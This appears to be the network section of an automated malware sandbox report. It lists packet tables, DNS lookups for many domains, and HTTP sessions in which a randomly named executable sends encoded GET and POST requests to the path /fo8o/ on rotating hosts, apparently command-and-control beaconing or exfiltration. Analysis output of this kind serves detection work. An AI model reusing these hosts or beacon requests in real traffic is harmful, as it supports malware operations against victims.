Jun 26, 2024 14:57:58.391834021 CEST	65254	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:58.396891117 CEST	80	65254	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:58.396987915 CEST	65254	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:58.399074078 CEST	65254	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:58.403970003 CEST	80	65254	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:58.954150915 CEST	80	65254	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:58.954463959 CEST	80	65254	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:58.954533100 CEST	65254	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:58.957427025 CEST	65254	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:58.962289095 CEST	80	65254	217.196.55.202	192.168.2.5
Jun 26, 2024 14:58:20.616849899 CEST	65255	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:20.621759892 CEST	80	65255	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:20.621843100 CEST	65255	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:20.623635054 CEST	65255	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:20.628562927 CEST	80	65255	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:21.233191013 CEST	80	65255	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:21.233803034 CEST	80	65255	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:21.240729094 CEST	65255	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:22.137830019 CEST	65255	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:23.158324957 CEST	65256	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:23.163494110 CEST	80	65256	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:23.167841911 CEST	65256	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:23.167841911 CEST	65256	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:23.172811031 CEST	80	65256	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:23.778795958 CEST	80	65256	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:23.778899908 CEST	80	65256	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:23.782399893 CEST	65256	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:24.669017076 CEST	65256	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:25.687083960 CEST	65257	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:25.692082882 CEST	80	65257	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:25.692204952 CEST	65257	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:25.694330931 CEST	65257	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:25.699206114 CEST	80	65257	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:25.699345112 CEST	80	65257	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:26.301176071 CEST	80	65257	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:26.301284075 CEST	80	65257	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:26.301358938 CEST	65257	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:27.202339888 CEST	65257	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:28.218624115 CEST	65258	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:28.223902941 CEST	80	65258	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:28.223998070 CEST	65258	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:28.226299047 CEST	65258	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:28.231161118 CEST	80	65258	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:29.165178061 CEST	80	65258	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:29.165337086 CEST	80	65258	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:29.165370941 CEST	80	65258	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:29.170006990 CEST	65258	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:29.170006990 CEST	65258	80	192.168.2.5	104.206.198.212
Jun 26, 2024 14:58:29.175030947 CEST	80	65258	104.206.198.212	192.168.2.5
Jun 26, 2024 14:58:34.220036030 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:34.225090027 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.225161076 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:34.227560997 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:34.233166933 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.942014933 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.942074060 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.942111969 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.942142963 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.942162037 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:34.942174911 CEST	80	65259	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:34.942193031 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:34.942238092 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:35.731456995 CEST	65259	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:36.752408981 CEST	65260	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:36.757886887 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:36.758014917 CEST	65260	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:36.761331081 CEST	65260	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:36.767288923 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:37.447815895 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:37.447874069 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:37.447910070 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:37.447946072 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:37.447978973 CEST	80	65260	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:37.450356007 CEST	65260	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:38.278367996 CEST	65260	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:39.298324108 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:39.303369045 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:39.305389881 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:39.305389881 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:39.310272932 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:39.310441971 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:40.000155926 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:40.000200987 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:40.000238895 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:40.000268936 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:40.000300884 CEST	80	65261	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:40.000310898 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:40.000353098 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:40.000401020 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:40.809715986 CEST	65261	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:41.830324888 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:41.835489035 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:41.835618973 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:41.838344097 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:41.843193054 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535288095 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535347939 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535382986 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535398960 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:42.535417080 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535451889 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535461903 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:42.535482883 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535517931 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535547018 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:42.535550117 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535588026 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535593033 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:42.535619974 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:42.535666943 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:42.539726973 CEST	65262	80	192.168.2.5	194.58.112.174
Jun 26, 2024 14:58:42.544616938 CEST	80	65262	194.58.112.174	192.168.2.5
Jun 26, 2024 14:58:50.595550060 CEST	65263	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:58:50.602174044 CEST	80	65263	154.215.72.110	192.168.2.5
Jun 26, 2024 14:58:50.602257013 CEST	65263	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:58:50.604423046 CEST	65263	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:58:50.609972954 CEST	80	65263	154.215.72.110	192.168.2.5
Jun 26, 2024 14:58:51.511838913 CEST	80	65263	154.215.72.110	192.168.2.5
Jun 26, 2024 14:58:51.511945963 CEST	80	65263	154.215.72.110	192.168.2.5
Jun 26, 2024 14:58:51.514478922 CEST	65263	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:58:51.517344952 CEST	65263	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:58:51.522209883 CEST	80	65263	154.215.72.110	192.168.2.5
Jun 26, 2024 14:58:56.531533957 CEST	65264	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:56.536616087 CEST	80	65264	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:56.536715984 CEST	65264	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:56.538496017 CEST	65264	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:56.543420076 CEST	80	65264	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:57.541126013 CEST	80	65264	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:57.545012951 CEST	80	65264	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:57.545840979 CEST	65264	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:58.044027090 CEST	65264	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:59.062382936 CEST	65265	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:59.067413092 CEST	80	65265	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:59.067620993 CEST	65265	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:59.069674969 CEST	65265	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:58:59.074534893 CEST	80	65265	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:59.869091034 CEST	80	65265	202.172.28.202	192.168.2.5
Jun 26, 2024 14:58:59.981405973 CEST	65265	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:59:00.625274897 CEST	80	65265	202.172.28.202	192.168.2.5
Jun 26, 2024 14:59:00.625344992 CEST	65265	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:59:00.918967962 CEST	65265	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:59:01.937016010 CEST	65266	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:59:01.942039967 CEST	80	65266	202.172.28.202	192.168.2.5
Jun 26, 2024 14:59:01.942353010 CEST	65266	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:59:01.944926977 CEST	65266	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:59:01.949875116 CEST	80	65266	202.172.28.202	192.168.2.5
Jun 26, 2024 14:59:01.949954987 CEST	80	65266	202.172.28.202	192.168.2.5
Jun 26, 2024 14:59:02.906375885 CEST	80	65266	202.172.28.202	192.168.2.5
Jun 26, 2024 14:59:02.950138092 CEST	65266	80	192.168.2.5	202.172.28.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 26, 2024 14:55:16.738977909 CEST	53	50988	1.1.1.1	192.168.2.5
Jun 26, 2024 14:55:23.044614077 CEST	56233	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:55:23.547272921 CEST	53	56233	1.1.1.1	192.168.2.5
Jun 26, 2024 14:55:39.515674114 CEST	56646	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:55:39.801651955 CEST	53	56646	1.1.1.1	192.168.2.5
Jun 26, 2024 14:55:53.374747038 CEST	62786	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:55:53.577662945 CEST	53	62786	1.1.1.1	192.168.2.5
Jun 26, 2024 14:56:07.109895945 CEST	61054	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:56:07.241782904 CEST	53	61054	1.1.1.1	192.168.2.5
Jun 26, 2024 14:56:20.521315098 CEST	51486	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:56:20.664772034 CEST	53	51486	1.1.1.1	192.168.2.5
Jun 26, 2024 14:56:33.988535881 CEST	52799	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:56:34.044276953 CEST	53	52799	1.1.1.1	192.168.2.5
Jun 26, 2024 14:56:47.453107119 CEST	54482	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:56:47.661362886 CEST	53	54482	1.1.1.1	192.168.2.5
Jun 26, 2024 14:56:55.720391035 CEST	51772	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:56:55.741486073 CEST	53	51772	1.1.1.1	192.168.2.5
Jun 26, 2024 14:57:08.972379923 CEST	55082	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:57:09.063637018 CEST	53	55082	1.1.1.1	192.168.2.5
Jun 26, 2024 14:57:22.438739061 CEST	59155	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:57:23.118205070 CEST	53	59155	1.1.1.1	192.168.2.5
Jun 26, 2024 14:57:36.312994957 CEST	51890	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:57:37.308233023 CEST	53	51890	1.1.1.1	192.168.2.5
Jun 26, 2024 14:57:50.594324112 CEST	53554	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:57:50.791641951 CEST	53	53554	1.1.1.1	192.168.2.5
Jun 26, 2024 14:58:03.970293045 CEST	57504	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:58:04.191936016 CEST	53	57504	1.1.1.1	192.168.2.5
Jun 26, 2024 14:58:12.360290051 CEST	53959	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:58:12.370820045 CEST	53	53959	1.1.1.1	192.168.2.5
Jun 26, 2024 14:58:20.438427925 CEST	61650	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:58:20.613929033 CEST	53	61650	1.1.1.1	192.168.2.5
Jun 26, 2024 14:58:34.189008951 CEST	65424	53	192.168.2.5	1.1.1.1
Jun 26, 2024 14:58:34.217317104 CEST	53	65424	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 26, 2024 14:55:23.044614077 CEST	192.168.2.5	1.1.1.1	0xc5f6	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:55:39.515674114 CEST	192.168.2.5	1.1.1.1	0x7fc6	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:55:53.374747038 CEST	192.168.2.5	1.1.1.1	0xe975	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:07.109895945 CEST	192.168.2.5	1.1.1.1	0xc6ed	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:20.521315098 CEST	192.168.2.5	1.1.1.1	0xb941	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:33.988535881 CEST	192.168.2.5	1.1.1.1	0xb846	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:47.453107119 CEST	192.168.2.5	1.1.1.1	0xd232	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:55.720391035 CEST	192.168.2.5	1.1.1.1	0x5939	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:08.972379923 CEST	192.168.2.5	1.1.1.1	0x79fc	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:22.438739061 CEST	192.168.2.5	1.1.1.1	0xc4d4	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:36.312994957 CEST	192.168.2.5	1.1.1.1	0x7b16	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:50.594324112 CEST	192.168.2.5	1.1.1.1	0xf45b	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:03.970293045 CEST	192.168.2.5	1.1.1.1	0x6df7	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:12.360290051 CEST	192.168.2.5	1.1.1.1	0x471	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:20.438427925 CEST	192.168.2.5	1.1.1.1	0x35ef	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:34.189008951 CEST	192.168.2.5	1.1.1.1	0xe019	Standard query (0)	www.b301.space	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 26, 2024 14:55:23.547272921 CEST	1.1.1.1	192.168.2.5	0xc5f6	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:55:39.801651955 CEST	1.1.1.1	192.168.2.5	0x7fc6	No error (0)	www.kasegitai.tokyo		202.172.28.202	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:55:53.577662945 CEST	1.1.1.1	192.168.2.5	0xe975	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:07.241782904 CEST	1.1.1.1	192.168.2.5	0xc6ed	No error (0)	www.antonio-vivaldi.mobi		46.30.213.191	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:20.664772034 CEST	1.1.1.1	192.168.2.5	0xb941	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 26, 2024 14:56:20.664772034 CEST	1.1.1.1	192.168.2.5	0xb941	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 26, 2024 14:56:20.664772034 CEST	1.1.1.1	192.168.2.5	0xb941	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:34.044276953 CEST	1.1.1.1	192.168.2.5	0xb846	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:47.661362886 CEST	1.1.1.1	192.168.2.5	0xd232	Server failure (2)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:56:55.741486073 CEST	1.1.1.1	192.168.2.5	0x5939	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:09.063637018 CEST	1.1.1.1	192.168.2.5	0x79fc	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jun 26, 2024 14:57:09.063637018 CEST	1.1.1.1	192.168.2.5	0x79fc	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:23.118205070 CEST	1.1.1.1	192.168.2.5	0xc4d4	No error (0)	www.donnavariedades.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 26, 2024 14:57:23.118205070 CEST	1.1.1.1	192.168.2.5	0xc4d4	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:37.308233023 CEST	1.1.1.1	192.168.2.5	0x7b16	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:37.308233023 CEST	1.1.1.1	192.168.2.5	0x7b16	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:57:50.791641951 CEST	1.1.1.1	192.168.2.5	0xf45b	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 26, 2024 14:57:50.791641951 CEST	1.1.1.1	192.168.2.5	0xf45b	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:04.191936016 CEST	1.1.1.1	192.168.2.5	0x6df7	Server failure (2)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:12.370820045 CEST	1.1.1.1	192.168.2.5	0x471	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:20.613929033 CEST	1.1.1.1	192.168.2.5	0x35ef	No error (0)	www.shenzhoucui.com		104.206.198.212	A (IP address)	IN (0x0001)	false
Jun 26, 2024 14:58:34.217317104 CEST	1.1.1.1	192.168.2.5	0xe019	No error (0)	www.b301.space		194.58.112.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.kasegitai.tokyo

www.goldenjade-travel.com

www.antonio-vivaldi.mobi

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.donnavariedades.com

www.660danm.top

www.empowermedeco.com

www.shenzhoucui.com

www.b301.space

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	65213	154.215.72.110	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:23.564460993 CEST	517	OUT	GET /fo8o/?Y8F=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:55:24.472089052 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Jun 2024 12:55:24 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	65214	202.172.28.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:39.810820103 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 48 50 75 37 52 67 5a 78 70 4d 5a 42 33 6f 64 4f 69 33 58 66 51 36 33 6a 67 67 56 65 72 38 4c 57 2b 46 67 66 30 67 3d Data Ascii: Y8F=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffHPu7RgZxpMZB3odOi3XfQ63jggVer8LW+Fgf0g=
